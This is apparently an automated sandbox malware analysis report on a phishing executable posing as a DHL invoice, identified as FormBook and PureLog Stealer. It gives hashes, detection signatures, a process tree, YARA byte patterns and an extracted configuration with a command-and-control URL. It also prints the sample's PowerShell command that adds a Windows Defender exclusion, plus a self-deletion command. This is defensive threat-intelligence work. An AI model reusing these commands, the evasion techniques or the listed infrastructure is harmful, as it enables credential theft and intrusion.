Edit tour

Windows Analysis Report
DHL Factura Electronica Pendiente documento No 04BB25083.exe

Overview

General Information

Sample name:	DHL Factura Electronica Pendiente documento No 04BB25083.exe
Analysis ID:	1396156
MD5:	57c1720399fe09ae9cb92000d830260a
SHA1:	5a9eccab9ebf649c94051ab9d2eaea47621ff3d6
SHA256:	d9e11bf6dbbb2e9e75574f370b57e32efd4be3b1ba193b934933515aed9b933e
Tags:	DHLexeFormbook
Infos:

Detection

FormBook, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected FormBook

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect virtualization through RDTSC time measurements

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

DHL Factura Electronica Pendiente documento No 04BB25083.exe (PID: 7472 cmdline: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe MD5: 57C1720399FE09AE9CB92000D830260A)

powershell.exe (PID: 7740 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

DHL Factura Electronica Pendiente documento No 04BB25083.exe (PID: 7760 cmdline: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe MD5: 57C1720399FE09AE9CB92000D830260A)

explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

systray.exe (PID: 7928 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 28D565BB24D30E5E3DE8AFF6900AF098)

cmd.exe (PID: 7952 cmdline: /c del "C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rdlva.com/pz08/"], "decoy": ["deespresence.com", "fanyablack.com", "papermoonnursery.com", "sunriseclohting.store", "jenstandsforarkansas.com", "lkhtalentconsulting.com", "baerana.com", "hyperphit.com", "davidianbrant.com", "itkagear.com", "web-findmy.site", "liveforwardventures.com", "skyenglearn.online", "studio-sticky.store", "yassa-hany.online", "tacoshack479.com", "bigtexture.xyz", "erxkula.shop", "go-bloggers.com", "qwdlwys.site", "taylorpritchett.com", "yobo-by.com", "trendsdrop.com", "boostyourselftoday.com", "taxibactrungnam.com", "sgzycp.net", "anti-theft-device-82641.bond", "ytytyt016.xyz", "loveyourhome.style", "ithinkmoney.com", "bertric.info", "permanentday.space", "kxn.ink", "onlythumbs.online", "techrihno.com", "washing-machine-46612.bond", "phdop.xyz", "nordens-media.com", "gourmetfoodfactory.com", "ketoalycetiworks.buzz", "amplilim.site", "usetruerreview.com", "inprime.xyz", "aloyoga-uae.com", "quickfibrokers.com", "primadesignerhomes.com", "greatlifehacks.online", "thewipglobal.com", "tobegoodlife.net", "hotelfincamalvasia.com", "trevts.com", "ae-skinlab.com", "grammarhome.com", "cld005.com", "first-solution.online", "keylabcerrajeria.com", "besttravelsgate.com", "friskiwear.com", "hedrickmanufactory.com", "pinewell.world", "5819995.com", "c2help.live", "kai3.center", "plantasdasminas.com"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1469792389.00000000039E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000007.00000002.3884970564.0000000004A20000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.3884970564.0000000004A20000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3884970564.0000000004A20000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000007.00000002.3884970564.0000000004A20000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.3884970564.0000000004A20000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.3884563234.0000000002F70000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.3884563234.0000000002F70000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3884563234.0000000002F70000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000007.00000002.3884563234.0000000002F70000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.3884563234.0000000002F70000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.1473298429.0000000005370000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1473432091.00000000053A0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000006.00000002.3899090558.000000000E089000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_772cc62d	unknown	unknown	0xa32:$a2: pass 0xa38:$a3: email 0xa3f:$a4: login 0xa46:$a5: signin 0xa57:$a6: persistent 0xc2a:$r1: C:\Users\user\AppData\Roaming\LN8N2C2V\LN8log.ini
00000000.00000002.1467009069.0000000002A23000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1469792389.0000000003BF8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.1469792389.0000000003BF8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1469792389.0000000003BF8000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x7f769:$a1: 3C 30 50 4F 53 54 74 09 40 0xadb89:$a1: 3C 30 50 4F 53 54 74 09 40 0x15e949:$a1: 3C 30 50 4F 53 54 74 09 40 0x960c8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xc44e8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1752a8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x83ed7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xb22f7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1630b7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x8edbf:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0xbd1df:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x16df9f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.1469792389.0000000003BF8000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x82e20:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8308a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xb1240:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xb14aa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x162000:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16226a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8ebbd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xbcfdd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x16dd9d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x8e6a9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xbcac9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16d889:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x8ecbf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xbd0df:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16de9f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x8ee37:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xbd257:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x16e017:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x83aa2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xb1ec2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x162c82:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.1469792389.0000000003BF8000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x91d51:$sqlite3step: 68 34 1C 7B E1 0x91e64:$sqlite3step: 68 34 1C 7B E1 0xc0171:$sqlite3step: 68 34 1C 7B E1 0xc0284:$sqlite3step: 68 34 1C 7B E1 0x170f31:$sqlite3step: 68 34 1C 7B E1 0x171044:$sqlite3step: 68 34 1C 7B E1 0x91d80:$sqlite3text: 68 38 2A 90 C5 0x91ea5:$sqlite3text: 68 38 2A 90 C5 0xc01a0:$sqlite3text: 68 38 2A 90 C5 0xc02c5:$sqlite3text: 68 38 2A 90 C5 0x170f60:$sqlite3text: 68 38 2A 90 C5 0x171085:$sqlite3text: 68 38 2A 90 C5 0x91d93:$sqlite3blob: 68 53 D8 7F 8C 0x91ebb:$sqlite3blob: 68 53 D8 7F 8C 0xc01b3:$sqlite3blob: 68 53 D8 7F 8C 0xc02db:$sqlite3blob: 68 53 D8 7F 8C 0x170f73:$sqlite3blob: 68 53 D8 7F 8C 0x17109b:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.1467009069.00000000029E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: DHL Factura Electronica Pendiente documento No 04BB25083.exe PID: 7472	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: DHL Factura Electronica Pendiente documento No 04BB25083.exe PID: 7472	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d36c:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: DHL Factura Electronica Pendiente documento No 04BB25083.exe PID: 7760	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x36eb6:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: systray.exe PID: 7928	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xa75:$a1: 3C 30 50 4F 53 54 74 09 40 0x44b52:$a1: 3C 30 50 4F 53 54 74 09 40 0x47b8d:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.2a138d0.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a39:$sqlite3step: 68 34 1C 7B E1 0x17b4c:$sqlite3step: 68 34 1C 7B E1 0x17a68:$sqlite3text: 68 38 2A 90 C5 0x17b8d:$sqlite3text: 68 38 2A 90 C5 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.2a138d0.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3a03790.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.5370000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.39e9970.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.2a238e8.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.5370000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.2a238e8.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.53a0000.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3a03790.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.53a0000.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.39e9970.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 17 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe, ParentImage: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe, ParentProcessId: 7472, ParentProcessName: DHL Factura 